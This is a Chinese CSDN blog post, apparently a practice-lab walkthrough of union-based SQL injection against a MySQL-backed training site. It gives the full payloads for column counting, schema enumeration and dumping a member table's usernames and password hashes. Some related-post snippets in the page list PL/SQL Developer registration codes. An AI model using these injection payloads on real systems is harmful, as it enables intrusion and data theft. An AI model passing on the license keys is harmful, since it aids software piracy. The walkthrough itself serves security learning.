简单的SQL注册 Mysql

最新推荐文章于 2022-10-08 23:28:15 发布
最新推荐文章于 2022-10-08 23:28:15 发布
阅读量401 收藏
点赞数
分类专栏: web 渗透学习 文章标签: sql java 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41619455/article/details/126007582
版权

 本次进行测试的目标是:XWAY科技管理系统V3.0

                                        XWAY科技管理系统V3.0icon-default.png?t=M666http://124.70.22.208:40182/new_list.php?id=1

对目标信息进行搜集:

    使用order by 测试出有4列

      使用 使页面报错弹出问题XWAY科技管理系统V3.0icon-default.png?t=M666http://124.70.22.208:40182/new_list.php?id=-1%20union%20select%201,2,3,4

 

 在爆出的错误位子,进行替代查询 

 

 

                                数据类型: mysql

                                数据库版本:version()  5.7.22-0ubuntu0.16.04.1

                                数据库名称:database()  mozhe_Discuz_StormGroup

                                操作系统:@@version_compile_os  Linux

                                 数据库用户:user() root@localhost

根据上收集的信息,我们进行下一步的测试 获取数据库和表名

union select 1,group_concat(table_name) ,3,4%20 from information_schema.tables where table_schema ="mozhe_Discuz_StormGroup"

获取到单个数据库 ,如果有多个则可在 字段名前加入 group_concat

得到二个数据名   StormGroup_member,notice

查询数据库下的列union select 1,group_concat(column_name) ,3,4%20 from information_schema.columns where table_name ="StormGroup_member"

 得到这些列明后,我们进行数据库的查

 对第一个表查询得到 mozhe    356f589a7df439f6f744ff19bb8092c0  进行解码提交key 发现不对,说明还有其他账户密码

对第二表查询得到 union select * from StormGroup_member limit 1,1

 得到:mozhe3cbc1d19814dcbc9ddf4a7ab3dc

 成功注入

总结 :

首先:

        判断注入:列名数量 使用order by x  判断出零界点

然后查询到当下数据库得名称

对数据库进行列查询

得到数据

高版本的数据库(5以上)一般默认有 information_schema.tables (记录数据库名称)、information_schema.columns

table_name (数据库名)        column_name(表名)

语句:

                操作系统 :@@version_compile_os

认养一天63头9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL基本语句1——创建、添加、删除
HCHHC的博客
03-14 8783
SQL基本语句1——创建、添加、删除 一、创建:create 1.创建数据库 create database 库名; 2.创建表 create table 表名( 列名1 varchar(10) primary key, 列名2 varchar(50) not null, 列名3 varchar(10) check (列名3 in ('男','女')), .... 列名n int ); 二、添加:inster insert into 表名 value('*** ','***','***
mysql+设计+密码长度_登陆+注册(三层+sql语句)
weixin_32559261的博客
02-18 290
啰嗦:今天面试,遇到这个上级测试,很容易的,因为一个错误,居然最后没做出来,心累回到家,1小时做完,我特么还加了密,我还验证,可是上天不给我一次重来的机会啊很垃圾的,小白可以看看,大神可以轻喷首先第一个问题就是:数据库字段的设计nvarchar与varchar的区别nvarhar:添加字段,自动用空格补齐后面的空余varvhar:无空格问题出现的原因:登陆判断时,输入文本框的值和数据库一样却...
SQL Server 数据库注册 SQL Server 服务器
程序员小白的博客
04-14 8460
注册 SQL Server 服务器 注册 SQL Server 服务器组 删除 SQL Server 服务器
Oracle SQL语句进行新建用户
qq_68384595的博客
10-08 3160
哈喽大家好,随着科技的发达,国家的强大,人类智慧的增长。我们的身边也越来越多所谓的人工智能,但是他们所谓的智能也是我们人类去进行编程代码,进行设定功能和各种精密的传感器来进行的。自然软件的开发也就成了不可缺少的重要部分。下面我们要讲的是oracle数据库的应用之一的如何给创建用户,因为呢orcale的原理是一个数据库,用户不能自己去建只能用开发者给的。所以需要我们给用户进行权限的设置。
php用户注册实现一句sql,注册 sql语句+后端PHP文件
weixin_32676541的博客
03-16 342
我们要验证注册的账户是不是已经存在,我们需要连接数据库,在数据库中进行搜索。涉及的知识点:1.后端PHP2.模拟数据库的搭建(通过XAMPP) 【将在下一章进行介绍】一、对数据库进行连接:$conn = new mysqli("localhost","root","","marvel");//这里通过PHP的对象创建,之后往这个对象中传参数第一个参数为本地主机第二个参数与第三个参数为账户密码,第四...
SQL Server导出到MYSQL简单方法
01-19
SQL导出到MYSQL的方法很多,现介绍一种无需编程,直接利用sqlmysql里的图形界面进行导入导出的简单方法。  前提是已经安装了sqlserver客户端和mysql的图形界面管理工具phpmyadmin。  在控制台根目录下打开...
MySql实现简单注册登录(易语言)
09-01
总的来说,通过理解易语言的关键命令,如`连接MySql`、`执行SQL语句`、`取记录集`、`读字段值`、`释放记录集`和`断开MySql`,以及基础的SQL语句,你就能构建一个简单注册登录系统。虽然示例中的界面较为基础,但...
易语言-易语言sql例程 mysql注册登录等
06-25
本压缩包文件包含的是易语言结合SQL(结构化查询语言)编写的例程,特别是针对MySQL数据库系统的应用,如用户注册和登录功能的实现。 首先,我们要理解SQL数据库中的核心作用。SQL是用于管理和处理关系数据库的...
Servlet+mysql+tomcat实现简单登录和注册
09-07
在本项目中,"Servlet+mysql+tomcat实现简单登录和注册",主要涉及了Web开发中的几个核心技术,包括Servlet、JSP、MySQL数据库以及Tomcat服务器。下面将详细阐述这些知识点及其相互间的配合。 1. **Servlet**: ...
mysql-sql.rar
05-31
3. 注册驱动:通过`Class.forName()`方法注册MySQL的JDBC驱动。 4. 建立连接:使用`DriverManager.getConnection()`方法创建到MySQL服务器的连接,需要提供服务器地址、数据库名、用户名和密码。 5. 创建Statement:...
用户注册和用户登录,SQl Server数据库
07-08
采用ASP.net写的用户注册,登录,其中包括界面,连接数据库
sqlserver2008R2应用添加实例步骤
11-30
一片好的操作步骤文档,能够解决你再数据库中添加实例是遇到的问题,让工作更加顺畅!
plsql 注册
qq_20147577的博客
06-18 361
4vkjwhfeh3ufnqnmpr9brvcuyujrx3n3le serial Number(序列号):226959 password(密码): xs374ca
plsql注册码,plsql过期了怎么办
sheng_xinjun的博客
03-08 5727
Product Code:4t46t6vydkvsxekkvf3fjnpzy5wbuhphqz serial Number:601769 password:xs374ca
简单sql登录和注册存储过程
zhangchangguo的专栏
11-26 1244
 首先我建好了一张用户表表中有俩个字段 一个是账号,一个是密码当然这里我写的知识简单的登录很注册,表明 users 用户表字段 accountnum  varchar(50) --表示账号         password     varchar(50) --表示密码 登录存储过程create proc use_login(@accountnum varchar(5
sql语句时间 XX时间用户注册
qq_35410576的博客
05-30 631
三天内注册的用户 SELECT * FROM user WHERE 1 = 1 AND create_time > DATE_SUB( NOW( ), INTERVAL 3 DAY ) ORDER BY create_time DESC DATE_SUB( NOW( ), INTERVAL 3 DAY ) 当前时间减三天 DATE_ADD( NOW( ), INTERVAL 10 MINUTE )当前时间加十分钟 2020年5月30号注册的用户 SELECT * FROM us
数据库操作语句大全(sql)
热门推荐
Twiss的博客
03-23 2万+
一、基础 1.1、说明:创建数据库 CREATE DATABASE database-name 1.2、说明:删除数据库 drop database dbname 1.3、说明:备份sql server 创建 备份数据的 device USE master EXEC sp_addumpdevice 'disk', 'testBack', 'c:\mssql7backup\test.dat...
javaweb登录注册mysql
最新发布
05-13
JavaWeb是一种使用Java作为编程语言的Web开发...总之,JavaWeb中的登录注册功能离不开MySQL数据库的支持,开发人员需要使用SQL语句和JDBC驱动程序来实现数据的查询、插入、更新和删除等操作,以实现登录注册等功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值